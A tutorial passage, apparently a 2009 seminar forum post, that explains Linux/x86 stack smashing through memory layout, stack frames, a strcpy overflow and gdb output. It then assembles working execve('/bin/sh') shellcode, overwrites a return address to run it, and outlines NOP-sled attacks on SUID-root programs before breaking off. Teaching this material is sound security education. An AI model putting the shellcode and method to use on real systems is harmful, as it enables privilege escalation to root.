electronics seminars · 28-12-2009, 04:30 PM

Chapter 1. Introduction
By combining the C programming language's liberal approach to memory
handling with specific Linux filesystem permissions, this operating system
can be manipulated to grant unrestricted privilege to unprivileged accounts
or users. A class of exploit that relies upon these two factors is commonly
known as a buffer overflow, or stack smashing, vulnerability. Stack smashing
plays an important role in high-profile computer security incidents. In order
to secure modern Linux systems, it is necessary to understand why stack
smashing occurs and what one can do to prevent it.
Pre-requisites
To understand what goes on, some C and assembly knowledge is required.
Familiarity with virtual memory and some operating system essentials, for
example how a process is laid out in memory, will be helpful. You MUST know
what a setuid binary is, and of course you need to be able to at least use
Linux systems. If you have experience with gdb/cc, that is a real advantage.
This document is Linux/ix86 specific. The details differ depending on the
operating system or architecture you're using.
Here, I have tried out some small buffer overflows that can be easily grasped.
The prerequisites described above are explained in some detail below.
Linux File System Permissions
In order to better understand stack smashing vulnerabilities, it is first necessary
to understand certain features of filesystem permissions in the Linux
operating system. Privileges in the Linux operating system are invested solely
in the user root, sometimes called the superuser; root's infallibility is expected
under every condition, including program execution. The superuser
is the main security weakness in the Linux operating system. Because the
superuser can do anything, once a person gains superuser privileges (for example,
by learning the root password and logging in as root), that person can
do virtually anything to the system. This explains why most attackers who
break into Linux systems try to become superusers.
Each program (process) started by the root user inherits the root user's
all-inclusive privilege. In most cases the inherited privilege is subsequently
passed to other programs spawned by root's running processes. Set UID
(SUID) permissions in the Linux operating system grant a user the privilege to
run programs or shell scripts as another user.
In the Linux operating system, the process in memory that handles the program
execution is usually owned by the user who executed the program. Using a
unique permission bit to indicate SUID, the filesystem indicates to the operating
system that the program will run under the file owner's ID rather
than the ID of the user who executed the program. Often, SUID programs
are owned by root; while these programs may be executable by an unprivileged
user on the system, they run in memory with unrestricted access
to the system. As one can see, SUID root permissions are used to grant an
unprivileged user temporary, and necessary, use of privileged resources.
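
As a minimal sketch of how that permission bit can be inspected from C, the
function below tests a file mode for the set-user-ID bit together with root
ownership. The name is_suid_root() is a hypothetical helper introduced here
for illustration only; S_ISUID, mode_t and uid_t come from the standard
<sys/stat.h> and <sys/types.h> headers.

```c
#include <sys/types.h>
#include <sys/stat.h>

/* Hypothetical helper: returns 1 if the mode carries the set-user-ID bit
 * and the file is owned by root (UID 0), 0 otherwise. */
int is_suid_root(mode_t mode, uid_t owner)
{
    /* S_ISUID is the set-user-ID bit (octal 04000) in the file mode. */
    return (mode & S_ISUID) != 0 && owner == 0;
}
```

In practice the two arguments would be the st_mode and st_uid fields filled
in by stat(2) for the file being examined.
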
Many Linux programs need to run with superuser privileges. These programs
are run as SUID root programs, when the system boots, or as network
servers. A single bug in any of these complicated programs can compromise
the safety of your entire system. This characteristic is probably a design flaw,
but it is basic to the design of Linux, and it is not likely to change. Exploitation
of this feature turned design flaw is critical in constructing buffer overflow
exploits.
Linux and the C programming language
The Linux operating system is inextricably linked to the C programming language.
All modern implementations of the Linux operating system are written
in the C programming language, including system binaries and the kernel.
What C gains in simplicity and efficiency, it sacrifices in terms of data integrity
and ease of use. The standard C library in most Linux implementations
is vulnerable to buffer overflows and memory leaks. This is not to be interpreted
as an error in the design of the language: C assumes the programmer
is responsible for data integrity.
Once a variable is allocated memory space in C, the language does nothing
to ensure that the expected contents of the variable fit into the allocated
memory. C programmers often use the terms buffer and array interchangeably;
thus, it is safe to define a buffer as a contiguous block of memory (core)
that holds multiple instances of an identical data type.
As with all variables in C, buffers are declared dynamic or static. Static
buffers are explicitly defined in the source code and are allocated at
load time in the data segment in memory. Dynamic buffers (automatic
variables, in C terms) are allocated at run time
on the stack. Due to the obvious limitations of static arrays, dynamic allocation
is the method used in all major programs and applications in the
Linux environment. Thus, "smashing the stack" or stack overflow exploits are
concerned only with programs that do dynamic allocation.
Chapter 2. What's a Buffer Overflow?
Memory layout
If you know C, you most probably know what a character array is. Assuming
that you code in C, you should already know the basic properties
of arrays, for instance that an array holds objects of a single type, e.g. int,
char or float. Just like all other data structures, they can be classified as
either "static" or "dynamic". Static variables are loaded into the data segment
of the program, whereas dynamic variables are allocated and deallocated within
the stack region of the executable in memory. "Stack-based" buffer
overflows occur here: we stuff more data into a data structure, say an array,
than it can hold, and we exceed the boundaries of the array, overwriting other
important data. Put simply, it is copying 20 bytes to an array that can hold
only 12 bytes.
The memory layout of a Linux binary is quite complex, and it became even
more complex after ELF ("Executable and Linkable Format") and
shared libraries were introduced. However, basically, every process starts running
with 3 segments:
Text Segment
The Text Segment is a read-only part that includes all the program instructions.
For instance, the assembly instructions that are the equivalent of the C code
below will be included in this segment:
for (i = 0; i < 10; i++)
    s += i;
Data Segment
The Data Segment is the block that holds initialized and uninitialized data
(the uninitialized part is also known as BSS). For example, if you code, at
file scope:
int i;
the variable is an uninitialized variable, and it'll be stored in the "uninitialized
variables" part of the Data Segment (BSS). And if you code:
int j = 5;
the variable is an initialized variable, and the space for the j variable will
be allocated in the "initialized variables" part of the Data Segment.
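
A small sketch of the two kinds of data, assuming file-scope definitions. The
names counter, limit and sum_globals() are hypothetical. The C language
guarantees that an object with static storage and no initializer starts out
as zero; placing it in BSS is the typical way an ELF toolchain arranges that,
not something the language itself promises.

```c
int counter;        /* no initializer: typically placed in BSS, starts as 0 */
int limit = 5;      /* explicit initializer: placed in initialized data     */

/* Hypothetical helper that reads both variables. */
int sum_globals(void)
{
    return counter + limit;
}
```
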
Stack Segment
The segment called the "Stack" is where dynamic variables (or, in C jargon,
automatic variables) are allocated and deallocated, and where return addresses
for functions are stored temporarily. For example, in the following
code snippet, the variable i is created on the stack, and just after the
function returns it is destroyed:
#include <stdio.h>

int myfunc(void)
{
    int i;
    for (i = 0; i < 10; i++)
        putchar('*');
    putchar('\n');
    return 0;
}
If we are to symbolize the stack:
0xBFFFFFFF ---------------------
| |
| . |
| . |
| . |
| . |
| etc |
| env/argv pointer. |
| argc |
|-------------------|
| |
| stack |
| |
| | |
| | |
| V |
/ /
\ \
| |
| ^ |
| | |
| | |
| |
| heap |
|-------------------|
| bss |
|-------------------|
| initialized data |
|-------------------|
| text |
|-------------------|
| shared libraries |
| etc. |
0x8000000 |-------------------|
_* STACK *_
The stack is, in basic terms, a data structure which all of you will remember from
your Data Structures courses. It has the same basic operation. It's a LIFO
(Last-In, First-Out) data structure. Its operations are controlled directly
by the CPU via some special instructions like PUSH and POP. You PUSH
some data to the stack, and POP some other data. Whoever comes in LAST
is the one who will go out FIRST. So, in technical terms, the first item that will
be popped from the stack is the one that was pushed last.
The SP (Stack Pointer) register on the CPU contains the address of the data that will
be popped from the stack. Whether SP points to the last data or the one after
the last data on the stack is CPU-specific; however, on the ix86 architecture, which
is our subject, SP points to the address of the last data on the stack. In ix86
protected mode (32 bit/double word), PUSH and POP instructions work in
4-byte units. Another important detail to be noted here is that the stack grows
downward, that is, if SP is 0x100, just after a PUSH EAX instruction SP will
become 0xFC and the value of EAX will be placed at address 0xFC.
The PUSH instruction subtracts 4 from ESP (remember the paragraph above)
and stores a double word at the address now held in the ESP register. The POP
instruction, on the other hand, reads the double word at the address held in
the ESP register and then adds 4 to ESP. Assuming that ESP is initially 0x1000,
let's examine the following assembly code:
PUSH dword1
;value at dword1: 1, ESP's value: 0xFFC (0x1000-4)
PUSH dword2
;value at dword2: 2, ESP's value: 0xFF8 (0xFFC-4)
PUSH dword3
;value at dword3: 3, ESP's value: 0xFF4 (0xFF8-4)
POP EAX
;EAX's value: 3, ESP's value: 0xFF8 (0xFF4+4)
POP EBX
;EBX's value: 2, ESP's value: 0xFFC (0xFF8+4)
POP ECX
;ECX's value: 1, ESP's value: 0x1000 (0xFFC+4)
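
The same sequence can be modelled in a few lines of C. This is only a sketch
under stated assumptions: struct sim_cpu and the sim_* functions are
hypothetical names, the "stack" is an ordinary array, and no overflow or
underflow checks are made in order to keep it short.

```c
#include <stdint.h>

#define SIM_STACK_TOP 0x1000u   /* initial ESP, as in the listing above */

/* Hypothetical model: a 4 KiB stack addressed by byte offset. */
struct sim_cpu {
    uint32_t mem[SIM_STACK_TOP / 4];
    uint32_t esp;
};

void sim_init(struct sim_cpu *cpu)
{
    cpu->esp = SIM_STACK_TOP;
}

/* PUSH: decrement ESP by 4, then store the value at the new ESP. */
void sim_push(struct sim_cpu *cpu, uint32_t value)
{
    cpu->esp -= 4;
    cpu->mem[cpu->esp / 4] = value;
}

/* POP: load the value at ESP, then increment ESP by 4. */
uint32_t sim_pop(struct sim_cpu *cpu)
{
    uint32_t value = cpu->mem[cpu->esp / 4];
    cpu->esp += 4;
    return value;
}
```

Pushing 1, 2 and 3 and then popping three times walks ESP through the same
values as the comments in the assembly listing, and returns 3, 2, 1 in that
order.
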
The stack, besides serving as temporary storage for dynamic variables, is also
used to store the return addresses of function calls and to pass parameters
to functions. And, of course, this is where evil things come into play.
EIP register, CALL & RET instructions
In each machine cycle, the CPU looks at what's stored in the Instruction Pointer
register (in ix86 32-bit protected mode this is EIP, the Extended Instruction
Pointer) to know what to execute next. The EIP register holds the address of the
instruction that will be executed next. Usually the addresses are
sequential, meaning that the instruction to be executed next is a few
bytes ahead of the current instruction in memory. The CPU calculates
that "few bytes" from the length of the current instruction
and adds it to the address of the current instruction.
To illustrate, assume that the current instruction's address is 0x8048438.
This is the value that's written in EIP. So the CPU is executing the instruction
found at memory location 0x8048438. Say it's a PUSH instruction:
push %ebp
CPU knows that a PUSH instruction is 1 byte long, so the next instruction
will be at 0x8048439, which may be
mov %esp,%ebp
While executing the PUSH, CPU will put the address of MOV in EIP.
Okay, we said that the values that'll be put in EIP are calculated by the CPU
itself. What if we JMP to a function? The instructions of the
function will be somewhere else in memory. After they are executed, how
can the CPU know where to resume the calling procedure?
For this, just before we JMP to the function, we save the address of the next
instruction in a temporary register, say EDX; and before returning from
the function we write the address in EDX back to EIP. If we used JMP
to jump to the addresses of functions, that would be very tiresome work
indeed.
However, the ix86 processor family provides us with two instructions, CALL and
RET, that make our lives easy! The CALL instruction writes that "next instruction
to be executed after the function returns" (from now on, we'll call this
the "return address") to the stack. It PUSHes it onto the stack, and writes
the address of the function to EIP. Thus, a function call is made. The RET instruction,
on the other hand, POPs the "return address" from the stack and
writes that address to EIP. Thus we'll safely return from the function
and continue with the program's next instruction.
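
What CALL and RET do to EIP and the stack can be sketched in C as follows.
The struct and function names are hypothetical, and the model ignores
everything about the CPU except these two registers and a small stack.

```c
#include <stdint.h>

/* Hypothetical model of EIP and a small stack. */
struct mini_cpu {
    uint32_t stack[64];
    uint32_t sp;    /* index of the top entry; 64 means empty */
    uint32_t eip;   /* address of the instruction being executed */
};

/* CALL: push the address of the instruction that follows the CALL
 * (the return address), then continue at the target. */
void do_call(struct mini_cpu *cpu, uint32_t target, uint32_t call_len)
{
    cpu->stack[--cpu->sp] = cpu->eip + call_len;
    cpu->eip = target;
}

/* RET: pop the return address from the stack into EIP. */
void do_ret(struct mini_cpu *cpu)
{
    cpu->eip = cpu->stack[cpu->sp++];
}
```

For a 5-byte call instruction located at 0x8048451 and targeting 0x8048440,
do_call() leaves 0x8048456 on the stack and do_ret() puts that value back
into EIP.
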
Let's have a look at the following code snippet:
x = 0;
function(1, 2, 3);
x = 1;
After the several assembly instructions for (x = 0) have been run, we need to go to
the memory location where function() is located. As we said earlier, for this to
happen, we first copy the return address (the address of the x = 1
instructions in this case) to some temporary space (which might be a register), jump
to the address of the function with JMP, and, at the end of the function,
restore the return address that we'd copied to EIP.
All these dirty operations are done on our behalf via CALL and RET by the
CPU itself, and you can get the details from the above paragraph. Generally,
the stack region of the program can be symbolized like this:
|_parameter_I____| ESP+8
|_parameter II___| ESP+4
|_return address_| ESP
ESP, EBP
The stack, as we've said, is also used to store dynamic variables. Dynamically,
the CPU PUSHes some data as the program requests new space,
and POPs other data when our program releases it. To address
the memory locations, we use "relative addressing". That means we address
the locations of data on our stack relative to some reference point. This
reference point is ESP, which stands for Extended Stack Pointer. This register
points to the top of the stack. Consider this:
void f()
{
int a;
}
As you can see, in the f() function, we allocate space for an integer variable
named a. The space for the integer variable a will be allocated on the stack,
and the computer will reference its address as an offset from ESP. So the stack
pointer is quite crucial for program execution. What if we call a function?
The calling function has a stack frame with some local variables, meaning it
relies on the stack pointer register. The function that is called from
within it will have local variables too, and it'll also need that stack pointer.
To overcome this, we use a second register, EBP (the base or frame pointer).
Just as we did for the return address, we PUSH the caller's EBP onto the stack,
copy the current ESP into EBP, and then reference the callee's parameters and
local variables relative to EBP.
And this is the symbolization of the stack once the caller's EBP has also been
PUSHed onto the stack:
|_parameter_I___| EBP+12
|_parameter_II__| EBP+8
|_return_address| EBP+4
|___saved_EBP___| EBP ESP
|_local var I __| EBP-4
|_local var II__| EBP-8
In the above picture, parameter I and II are the arguments passed to the
function. After the return address and the saved EBP, local var I and II are the
local variables of the function. Now, if we sum up all we said, while calling a
function:
1. We save the address of the next instruction (the return address), PUSHing
it onto the stack. This is done by CALL.
2. We save the caller's frame pointer (the old EBP), PUSHing it onto the stack,
and copy ESP into EBP.
3. And we start executing the instructions of the function.
These 3 steps take place every time we call a subroutine, say a function.
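
The frame layout can be checked with a small simulation. This is a sketch
only: struct frame_sim and its functions are hypothetical names, the argument
order assumes the usual C convention of pushing arguments in reverse (so the
first argument ends up at EBP+8), and 8 bytes of locals are assumed.

```c
#include <stdint.h>

/* Hypothetical model: 256 bytes of stack memory, addressed by byte offset. */
struct frame_sim {
    uint32_t mem[64];
    uint32_t esp;   /* byte offset of the top of the stack */
    uint32_t ebp;   /* byte offset of the current frame base */
};

static void push(struct frame_sim *s, uint32_t v)
{
    s->esp -= 4;
    s->mem[s->esp / 4] = v;
}

/* Read the 32-bit word at EBP + offset (offset may be negative). */
uint32_t at_ebp(const struct frame_sim *s, int32_t offset)
{
    return s->mem[(s->ebp + (uint32_t)offset) / 4];
}

/* Simulate calling a two-argument function that has 8 bytes of locals. */
void enter_function(struct frame_sim *s, uint32_t arg1, uint32_t arg2,
                    uint32_t return_address)
{
    push(s, arg2);             /* caller pushes arguments in reverse order */
    push(s, arg1);
    push(s, return_address);   /* done by CALL */
    push(s, s->ebp);           /* prologue: pushl %ebp */
    s->ebp = s->esp;           /* prologue: movl %esp,%ebp */
    s->esp -= 8;               /* room for two 4-byte locals */
}
```

After enter_function() returns, at_ebp(s, 0) yields the caller's EBP,
at_ebp(s, 4) the return address, and at_ebp(s, 8) and at_ebp(s, 12) the two
arguments, while the locals live at EBP-4 and EBP-8.
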
An Illustration
Let's see the operation of the stack, and the procedure prologue, in a live example:
void fun(int a, int b, int c)
{
    char z[4];
}
void main()
{
    fun(1, 2, 3);
}
Compile this with the -g flag to enable debugging:
$ gcc -g a.c -o a
Let's see what happened there:
$ gdb -q ./a
(gdb) disassemble main
Dump of assembler code for function main:
0x8048448 <main>: pushl %ebp
0x8048449 <main+1>: movl %esp,%ebp
0x804844b <main+3>: pushl $0x3
0x804844d <main+5>: pushl $0x2
0x804844f <main+7>: pushl $0x1
0x8048451 <main+9>: call 0x8048440 <fun>
0x8048456 <main+14>: addl $0xc,%esp
0x8048459 <main+17>: leave
0x804845a <main+18>: ret
End of assembler dump.
(gdb)
As you can see above, in main() the first instruction is:
0x8048448 <main>: pushl %ebp
which backs up the caller's frame pointer (the old EBP) by pushing it onto the stack.
Then the current stack pointer is copied to the EBP register:
0x8048449 <main+1>: movl %esp,%ebp
Thus, from then on, in the function, we'll reference the function's local variables
relative to EBP. These two instructions are called the "Procedure Prologue".
Then, we PUSH the arguments of the function fun() onto the stack in reverse
order:
0x804844b <main+3>: pushl $0x3
0x804844d <main+5>: pushl $0x2
0x804844f <main+7>: pushl $0x1
We call the function:
0x8048451 <main+9>: call 0x8048440 <fun>
As I've explained, by CALLing we PUSHed the address of the next instruction,
addl $0xc,%esp at 0x8048456, onto the stack. After the function
RETurns, we add 12 (0xc in hex) to ESP, since we pushed 3 arguments onto the
stack, each occupying 4 bytes (integers).
Then we leave the main() function, and return:
0x8048459 <main+17>: leave
0x804845a <main+18>: ret
OK, what happened inside the function fun()?
(gdb) disassemble fun
Dump of assembler code for function fun:
0x8048440 <fun>: pushl %ebp
0x8048441 <fun+1>: movl %esp,%ebp
0x8048443 <fun+3>: subl $0x4,%esp
0x8048446 <fun+6>: leave
0x8048447 <fun+7>: ret
End of assembler dump.
(gdb)
The first two instructions are just the same. They are the procedure prologue.
Then we see:
0x8048443 <fun+3>: subl $0x4,%esp
which subtracts 4 bytes from ESP. This is to allocate space for the local
variable z. We declared it as char z[4], remember? It is a 4-byte character
array. And, at the end, the function returns:
0x8048446 <fun+6>: leave
0x8048447 <fun+7>: ret
A simple example
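#include <string.h>

void fun(char *str)
{
    char foo[16];
    strcpy(foo, str);       /* no bounds check: overflows foo */
}

int main(void)
{
    char large_one[256];
    memset(large_one, 'A', 255);
    large_one[255] = '\0';  /* terminate the string for strcpy() */
    fun(large_one);
    return 0;
}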
$ cc -W -Wall -pedantic -g c.c -o c
$ ./c
Segmentation fault (core dumped)
What we do above is simply write 255 bytes to an array that can hold only
16 bytes. We passed a large array of 256 bytes as a parameter to the fun()
function. Within the function, without bounds checking, we copied the whole of
large_one to foo, overflowing foo and the data that follows it. Thus, once the
buffer was filled, strcpy() went on to fill other portions of memory, including the
return address, with A.
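
For contrast, here is a minimal sketch of a bounds-checked variant of fun().
The name fun_checked() and its return convention are assumptions made for
this illustration; the point is only that the length is compared against the
size of foo before anything is copied.

```c
#include <string.h>

/* Bounds-checked variant of fun(): refuses input that does not fit.
 * Returns 0 on success, -1 if str plus its terminating NUL is too long. */
int fun_checked(const char *str)
{
    char foo[16];

    if (strlen(str) >= sizeof foo)
        return -1;          /* would overflow foo: reject */
    strcpy(foo, str);       /* safe: the length was verified above */
    return 0;
}
```

With this check, passing large_one makes the function return -1 instead of
overwriting the return address.
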
Here is the inspection of generated core file with gdb:
$ gdb -q c core
Core was generated by `./c'.
Program terminated with signal 11, Segmentation fault.
find_solib: Can't read pathname for load map: Input/output error
#0 0x41414141 in ?? ()
(gdb)
As you can see, the CPU saw 0x41414141 (0x41 is the hex ASCII code for the letter
A) in EIP and tried to fetch and execute the instruction located there. However,
0x41414141 was not a memory address that our program was allowed to access.
In the end, the OS sent a SIGSEGV (Segmentation Violation) signal to the
program and stopped any further execution. When we called fun(), the stack
looked like this:
|______*str______| EBP+8
|_return address_| EBP+4
|___saved_EBP____| EBP ESP
|______foo1______| EBP-4
|______foo1______| EBP-8
|______foo1______| EBP-12
|______foo1______| EBP-16
strcpy() copied large_one to foo without bounds checking, filling the
stack with A, starting from the beginning of foo at EBP-16. Now that we can
overwrite the return address, if we put the address of some other memory
location there, can we execute the instructions at that location? The answer is yes.
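
The effect on the return address can be reproduced safely in a simulation.
In this sketch the frame is modelled as a 28-byte local array laid out like
the diagram above (16 bytes of foo, then the 4-byte saved frame pointer, then
the 4-byte return address, then the 4-byte str pointer). The function name
and the two initial addresses are made up, and every write stays inside the
array, so nothing is actually smashed.

```c
#include <stdint.h>
#include <string.h>

#define FOO_SIZE   16   /* char foo[16] */
#define FRAME_SIZE 28   /* foo + saved frame pointer + return address + str */

/* Hypothetical simulation: write `len` bytes of 'A' into a model of the
 * frame, starting at foo, and return the resulting "return address". */
uint32_t simulated_return_address(size_t len)
{
    unsigned char frame[FRAME_SIZE];
    const uint32_t saved_ebp = 0xbffff000u;     /* made-up value */
    const uint32_t ret_addr  = 0x08048456u;     /* made-up value */
    uint32_t result;

    memset(frame, 0, sizeof frame);
    memcpy(frame + FOO_SIZE, &saved_ebp, 4);        /* slot at EBP     */
    memcpy(frame + FOO_SIZE + 4, &ret_addr, 4);     /* slot at EBP + 4 */

    if (len > sizeof frame)
        len = sizeof frame;     /* keep the simulation itself in bounds */
    memset(frame, 'A', len);    /* what the unchecked copy would write */

    memcpy(&result, frame + FOO_SIZE + 4, 4);
    return result;
}
```

Up to 20 bytes the return address survives; from 24 bytes on it reads back as
0x41414141, which is the value gdb reported in EIP.
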
Assume that we place some /bin/sh spawning instructions at some memory
address, and we put that address in place of the return address of the function
that we overflow. We can then spawn a shell, and most probably a root
shell, since we are mainly interested in setuid binaries.
Chapter 3. The Attack
Shell Code
As shown in the previous section, by manipulating dynamically allocated
variables with unbounded byte copy operations, execution of arbitrary code
is possible via the return address blindly 'restored' following a function exit.
The ability to execute arbitrary code as the superuser is often
used with calls that allow an attacker to continue executing an indefinite
number of commands as root.
To obtain maximum root system privilege, the interactive Bourne shell program,
/bin/sh, is spawned. The Bourne shell exists on every
modern UNIX system, and is commonly the default system shell for the privileged
user. Any system shell can be used in shell code; however, in the
interest of keeping this study as generic as possible, /bin/sh is assumed.
In order to arrange an interactive shell, a static /bin/sh execution
sequence must appear somewhere in memory so that a manipulated 'return
address' can point to that location. This is accomplished by using a
hexadecimal string holding the machine-code equivalent of the standard C
function call execve(name[0], name, NULL), where name[0] points to "/bin/sh".
Assembly language equivalents of this call are hardware dependent. Using debugging
utilities, it is possible to dissect a call such as execve(name[0], name,
NULL) by breaking it down into a simple assembly sequence, and storing
it in a character array or other contiguous data structure. On an Intel x86
machine running Linux, the following steps are used in formulating
shell code:
1. The null-terminated string /bin/sh exists somewhere in memory.
2. The address of the string /bin/sh exists somewhere in memory, followed
by a null long word.
3. 0xb is copied into the EAX register.
4. The address of the string /bin/sh is copied into the EBX register.
5. The address of the address of the string /bin/sh is copied into the ECX register.
6. The address of the null long word is copied into the EDX register.
7. The int $0x80 instruction is executed, a standard Intel CPU interrupt.
8. 0x1 is copied into the EAX register.
9. 0x0 is copied into the EBX register.
10. The int $0x80 instruction is executed, a standard Intel CPU interrupt.
This listing can be reduced to actual x86 shell code in a standard ANSI C
character array.
How to execute /bin/sh ?
In C, the code to spawn a shell would be like this:
#include <unistd.h>

void main()
{
    char *shell[2];

    shell[0] = "/bin/sh";   /* program to execute, also argv[0] */
    shell[1] = NULL;        /* the argument array must end with NULL */
    execve(shell[0], shell, NULL);
}
$ cc -W -Wall -pedantic -g shell.c -o shell
$ ./shell
bash$
If you look at the man page of execve, you'll see that execve expects a pointer
to the filename that'll be executed, a NULL-terminated array of arguments,
and an environment pointer, which can be NULL. If you compile and run the
output binary, you'll see that you spawn a new shell.
So far so good... But we cannot spawn a shell in this way, right? How can we
send this code to the vulnerable program? We can't! This poses
a new question: how can we pass our evil code to the vulnerable program?
We will need to pass our code, which will possibly be shell code, in the
vulnerable buffer. For this to happen, we have to be able to represent our
shell code as a string.
Thus we'll list all the assembly instructions needed to spawn a shell, get their
opcodes, list them one by one, and assemble them into a shell-spawning string.
First, let's see how the above code looks in assembly. Let's compile the program
statically (this way, the execve system call wrapper will also be disassembled)
and see:
$ gcc -static -g -o shell shell.c
$ objdump -d shell | grep \<__execve\>: -A 12
0804ca10 <__execve>:
804ca10: 53 pushl %ebx
804ca11: 8b 54 24 10 movl 0x10(%esp,1),%edx
804ca15: 8b 4c 24 0c movl 0xc(%esp,1),%ecx
804ca19: 8b 5c 24 08 movl 0x8(%esp,1),%ebx
804ca1d: b8 0b 00 00 00 movl $0xb,%eax
804ca22: cd 80 int $0x80
804ca24: 5b popl %ebx
804ca25: 3d 01 f0 ff ff cmpl $0xfffff001,%eax
804ca2a: 0f 83 00 02 00 jae 804cc30 <__syscall_error>
804ca2f: 00
804ca30: c3 ret
804ca31: 90 nop
Let's analyze the syscall step by step. Remember, in our main() function, we
coded:
execve(shell[0], shell, NULL)
We passed the address of the string "/bin/sh", the address of the NULL-terminated
array, and NULL (which is in fact the env address).
Here in the main:
$ objdump -d shell | grep \<main\>: -A 17
08048124 <main>:
8048124: 55 pushl %ebp
8048125: 89 e5 movl %esp,%ebp
8048127: 83 ec 08 subl $0x8,%esp
804812a: c7 45 f8 ac 92 movl $0x80592ac,0xfffffff8(%ebp)
804812f: 05 08
8048131: c7 45 fc 00 00 movl $0x0,0xfffffffc(%ebp)
8048136: 00 00
8048138: 6a 00 pushl $0x0
804813a: 8d 45 f8 leal 0xfffffff8(%ebp),%eax
804813d: 50 pushl %eax
804813e: 8b 45 f8 movl 0xfffffff8(%ebp),%eax
8048141: 50 pushl %eax
8048142: e8 c9 48 00 00 call 804ca10 <__execve>
8048147: 83 c4 0c addl $0xc,%esp
804814a: c9 leave
804814b: c3 ret
804814c: 90 nop
Before the call to execve (call 804ca10 <__execve>), we pushed the arguments
onto the stack in reverse order. So, if we turn back to __execve:
We copy NULL (the env pointer) to the EDX register, we copy the address of the
NULL-terminated array into the ECX register, we copy the address of the string
"/bin/sh" into the EBX register, and we copy the syscall index for execve, which
is 11 (0xb), to the EAX register. Then we change into kernel mode.
This is all we need. However, there is a problem here: we cannot
know the exact addresses of the NULL-terminated array and of the string
"/bin/sh". So, how about this?
xorl %eax, %eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
cdql
movb $0x0b,%al
int $0x80
Let's try to explain the above instructions. If you xor something with itself,
you get 0, the equivalent of NULL. Here, we get a NULL in the EAX register. Then we
push the NULL onto the stack. We push the string "//sh" onto the stack:
2f is /
2f is /
73 is s
68 is h
pushl $0x68732f2f
We push string "/bin" onto the stack:
2f is /
62 is b
69 is i
6e is n
pushl $0x6e69622f
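
The characters appear in reverse order inside each constant because ix86 is
little-endian: the lowest-addressed byte of a pushed double word is its least
significant byte. A small sketch makes the packing explicit; pack_le() is a
hypothetical helper, not something the shell code itself uses.

```c
#include <stdint.h>

/* Hypothetical helper: pack four characters into the 32-bit immediate
 * that, once pushed on a little-endian CPU, lays them out in memory in
 * their original order. */
uint32_t pack_le(const char s[4])
{
    return  (uint32_t)(unsigned char)s[0]
         | ((uint32_t)(unsigned char)s[1] << 8)
         | ((uint32_t)(unsigned char)s[2] << 16)
         | ((uint32_t)(unsigned char)s[3] << 24);
}
```

pack_le("//sh") gives 0x68732f2f and pack_le("/bin") gives 0x6e69622f, the two
immediates used above. "//sh" is pushed first because the stack grows
downward, so "/bin" ends up at the lower address, in front of it.
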
As you can guess, the stack pointer now holds the address of
our NULL-terminated string "/bin//sh" (the doubled slash is harmless and pads
the string to exactly 8 bytes). Because, starting from the
stack pointer, which points to the top of the stack, we have a NULL-terminated
character array. So, we copy the stack pointer to the EBX register. See, we have
now placed the address of the string into the EBX register:
movl %esp,%ebx
Then we need to set ECX to the address of the NULL-terminated array. To do
this, we create a NULL-terminated array on our stack, very similar to the
one above. First we PUSH a NULL. We can't PUSH a literal NULL, but we can
PUSH something which is NULL; remember that we xor'd the EAX register and
we have NULL there, so let's PUSH EAX to get a NULL on the stack:
pushl %eax
Then we PUSH the address of our string onto the stack; this is the equivalent of
shell[0]:
pushl %ebx
Now that we have a NULL terminated array of pointers, we can save its address
in ECX:
movl %esp,%ecx
What else do we need? A NULL in the EDX register. We could use movl %eax,%edx,
but we can do this with a shorter instruction: cdq. This instruction
sign-extends what's in EAX into EDX; since EAX is 0, EDX becomes 0 too:
cdql
We set EAX to 0xb, which is the syscall number of execve in the system call table:
movb $0x0b,%al
Then, we change into kernel mode:
int $0x80
After we go into kernel mode, the kernel will exec what we instructed it to:
/bin/sh, and we will enter an interactive shell...
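
A likely reason for choosing xorl and movb over the more obvious movl forms
is that the shell code will later travel through string functions such as
strcpy(), which stop copying at the first zero byte. The text does not state
this motivation outright, so treat it as an assumption. The sketch below
counts zero bytes in two encodings that both appear in the listings of this
chapter; count_zero_bytes() and the two array names are hypothetical.

```c
#include <stddef.h>

/* Hypothetical helper: count zero bytes in an encoded instruction. */
size_t count_zero_bytes(const unsigned char *code, size_t len)
{
    size_t i, zeros = 0;

    for (i = 0; i < len; i++)
        if (code[i] == 0x00)
            zeros++;
    return zeros;
}

/* movl $0xb,%eax as encoded in the __execve disassembly */
const unsigned char movl_eax[] = { 0xb8, 0x0b, 0x00, 0x00, 0x00 };
/* movb $0x0b,%al as used in the hand-written sequence */
const unsigned char movb_al[]  = { 0xb0, 0x0b };
```

The movl form contains three zero bytes, while the movb form contains none.
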
So, after this much philosophy, all we need is to convert these asm
instructions into a string. So, let's get the hexadecimal opcodes and assemble
our evil code. Here we put our evil code in the character array sc[]. Let's test
our shell code:
char sc[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
main()
{
    int *ret;
    ret = (int *)&ret + 2;  /* point at main()'s saved return address */
    *ret = (int)sc;         /* make it point to the shell code */
}
$ gcc -g -o shellcode shellcode.c
$ ./shellcode
bash$
Hmm, it works.
What we've done above is increase the address of ret (which is a pointer to
integer) by 2 double words (8 bytes), thus reaching the memory location where
main()'s return address is stored. And then, because ret
now points to the return address, we stored the address of sc (which is our
evil code) through ret. In effect, we changed the value of the return address. The
return address then pointed to sc[]. When main() issued RET, the address of sc
was written to EIP, and consequently the CPU started executing
the instructions there, resulting in the execution of /bin/sh.
Chapter 4. Creative stack smashing
SUID root programs included in Linux distributions are not precompiled with
shell code as part of the binary. To exploit these types of programs, some
means must be used to insert the shell code array into the runtime environment.
Stack smashers have devised creative ways to accomplish this. In
order to inject the shell code into the running process, stack smashers have
filled command line arguments, shell environment variables, and interactive
input functions with the necessary shell code sequence.
Not only do most stack smashing exploits rely upon shell code to accomplish
their task, but these types of exploits also depend on knowing at what address
in memory this shell code will reside. Taking this into consideration, many
stack smashers have padded their shell code with NOP (no-operation) assembly
instructions; this gives the shell code a 'wider space' in memory and makes
it easier to guess where the shell code may be when manipulating the return
address. This approach, combined with an approach whereby the shell
code is followed by many instances of the 'guessed' return address in memory,
is a common strategy used in constructing stack smashing exploits. An
